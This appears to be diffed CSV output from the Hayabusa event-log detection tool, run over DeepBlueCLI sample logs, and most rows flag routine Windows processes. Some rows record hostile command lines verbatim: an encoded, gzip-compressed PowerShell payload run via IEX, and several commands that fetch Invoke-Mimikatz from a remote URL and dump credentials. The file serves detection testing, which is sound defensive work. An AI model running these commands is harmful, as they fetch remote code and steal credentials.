+2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:32:11.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:32:11.932 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:32:15.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:03:41.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:04:04.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:05:07.184 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:05:22.839 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:38:23.648 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:28.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:32.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:32.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:38.772 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:41.273 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:41.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:21:52.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:29:34.138 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:29:34.389 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:29:35.564 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xfa0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:36:49.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:36:49.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 08:36:50.791 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:00:02.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:45.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:45.870 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 10:00:00.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 10:28:55.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 10:28:55.343 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:31.558 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:32.423 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:32.538 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:43.023 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:44:04.646 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:44:04.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:42.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:42.440 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:42.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:46.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 21:48:54.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:13.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:23.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:07:41.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
